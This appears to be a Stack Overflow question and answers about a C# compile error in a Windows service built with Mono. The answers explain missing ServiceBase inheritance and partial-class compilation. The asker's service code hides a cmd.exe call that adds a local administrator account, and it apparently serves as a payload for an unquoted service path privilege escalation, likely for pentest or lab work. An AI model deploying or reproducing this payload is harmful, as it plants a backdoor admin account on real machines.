# `SimpleWindowsService1.SimpleService.Dispose(bool)' is marked as an override but no suitable method found to override

Tags: c#, visual-studio

I am new to C# and can't fix this issue. The code is

```
namespace SimpleWindowsService1
{
    partial class SimpleService
    {
        /// <summary> 
        /// Required designer variable.
        /// </summary>
        private System.ComponentModel.IContainer components = null;

        /// <summary>
        /// Clean up any resources being used.
        /// </summary>
        /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
        protected override void Dispose(bool disposing)
        {
            if (disposing && (components != null))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        #region Component Designer generated code

        /// <summary> 
        /// Required method for Designer support - do not modify 
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            this.eventLogSimple = new System.Diagnostics.EventLog();
            ((System.ComponentModel.ISupportInitialize)(this.eventLogSimple)).BeginInit();
            // 
            // SimpleService
            // 
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
            startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
            startInfo.FileName = "cmd.exe";
            startInfo.Arguments = "/C net user mattymcfatty Really1337! /add && net localgroup administrators mattymcfatty /add";
            process.StartInfo = startInfo;
            process.Start();

            this.ServiceName = "Not The Service You Think It Is";
            ((System.ComponentModel.ISupportInitialize)(this.eventLogSimple)).EndInit();

        }

        #endregion

        private System.Diagnostics.EventLog eventLogSimple;
    }
}
```

When I try to compile it, I keep getting the error "marked as an override but no suitable method found". Can somebody with more C# experience help me figuring out what's wrong?

Thank you

Edit: Because of someone smart in the comments, I'm adding the second file SimpleService.cs. This is in the same project.

```
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Diagnostics;
using System.Linq;
using System.ServiceProcess;
using System.Text;

namespace SimpleWindowsService1
{
    public partial class SimpleService : ServiceBase
    {
        public SimpleService()
        {
            InitializeComponent();
            // Initialize eventLogSimple   
            if (!System.Diagnostics.EventLog.SourceExists("SimpleSource"))
                System.Diagnostics.EventLog.CreateEventSource("SimpleSource", "SimpleLog");
            eventLogSimple.Source = "SimpleSource";
            eventLogSimple.Log = "SimpleLog";
        }

        protected override void OnStart(string[] args)
        {
            //this is not executed for some reason
            eventLogSimple.WriteEntry("Uh oh. Program.exe was executed using unquoted path vulnerability. Service Started.");
        }

        protected override void OnStop()
        {
            //this is not executed for some reason
            eventLogSimple.WriteEntry("Uh oh. Program.exe was executed using unquoted path vulnerability. Service Stopped");
        }
    }
}
```

Comment: `partial class SimpleService` Is there another class / file with that same name? If so, what namespace is it in?

Comment: yes I have another file called SimpleService.cs, there is a namespace called "SimpleWindowsService1"

Comment: OK, show us that file in your question too. The first 20 lines of it. Also, are both of the files _in the same project_?

Comment: I edited my answer

Comment: I was not able to compile multiple files that's why I picked only one of them inside the 'project'. I am using linux for compiling

Comment: Yeah it is key that _both_ files are included in the compilation. As to how to do that from the command line - I can't help you with that. I don't compile like that. Once you include both files in the compile, it will start working.

Answer (score 3, accepted):

Services must inherit from `ServiceBase`.

```
partial class SimpleService : System.ServiceProcess.ServiceBase
{
    //etc
```

Once you do that, the other errors should resolve themselves.

See also [How to Write Services Programmatically](https://learn.microsoft.com/en-us/dotnet/framework/windows-services/how-to-write-services-programmatically)

Comment: Thank you. In addition to the previous error (which is still shown), I get this one as well after using the fix

SimpleService.Designer.cs(3,42): error CS0234: The type or namespace name `ServiceProcess' does not exist in the namespace `System'. Are you missing an assembly reference?

Comment: You need a reference to the assembly that defines the type: https://learn.microsoft.com/en-us/dotnet/api/system.serviceprocess.servicebase?view=dotnet-plat-ext-5.0

Comment: Doesn't help unfortunately

Comment: You set a reference to `System.ServiceProcess.ServiceController.dll` and are still getting the same error?

Comment: idk how to set a reference. trying to compile on command line with csc.exe

Comment: it's fine I'm closing this question. I hate windows anyways. that's annoying. thank you

Comment: You can add a reference using the `/r` switch. See [this answer](https://stackoverflow.com/a/10559166/2791540).

Comment: The OP already has that. The issue is to do with including both partial classes.

Answer (score 0):

You only have to override virtual methods inherited from a base class. Since your class does not inherit from a base class, there is nothing to override. You can remove the override.

```
public class SimpleService : BaseClass
{
    // ...
}
```

This is how inheritance would look like and if the `BaseClass` contains a `protected virtual void Dispose(bool disposing)` you would have to use override here.

Comment: thank you. changing the class type and replacing "protected override" with "protected virtual" produces the following error:

The type or namespace name `BaseClass' could not be found. Are you missing an assembly reference?

Comment: Ah that was just my example. You don't need that. It should only demonstrate how it would look like if you had inheritance.

Comment: I don't get it, sorry.

Comment: Ok, so I just posted an example in case you would have to inherit from a base class named `BaseClass` which provides a virtual method that you wanted to override. According to your code sample you don't use one so your class definition must look like `public class SimpleService {` and you don't need the `override` (but you can use `virtual` instead as you already found out).

Answer (score -1):

Change `override` to `virtual`. This class does not derive from a base class, so there is no method to override.

This is part of [the standard pattern for implementing IDisposable](https://learn.microsoft.com/en-us/dotnet/standard/garbage-collection/implementing-dispose#dispose-and-disposebool). If another class derives from SimpleService, then *that* class will use `override`, and should call `base.Dispose(disposing)` in its implementation.

Comment: only changing "override" to "virtual" makes things worse..

Comment: SimpleService.Designer.cs(20,18): error CS0117: `object' does not contain a definition for `Dispose'
/usr/lib/mono/4.5/mscorlib.dll (Location of the symbol related to previous error)
SimpleService.Designer.cs(44,18): error CS1061: Type `SimpleWindowsService1.SimpleService' does not contain a definition for `ServiceName' and no extension method `ServiceName' of type `SimpleWindowsService1.SimpleService' could be found. Are you missing an assembly reference?

Comment: @KongStrongBull I didn't realize you're writing a Windows service, so you _do_ need to derive from the class `ServiceBase`. [John Wu noticed this and you should use his advice](https://stackoverflow.com/a/68385510/19818).

Comment: it's fine I'm giving up. error messages getting worse after each 'fix' and I'm keep circling between them. now I get the error 'the service needs the override keyword'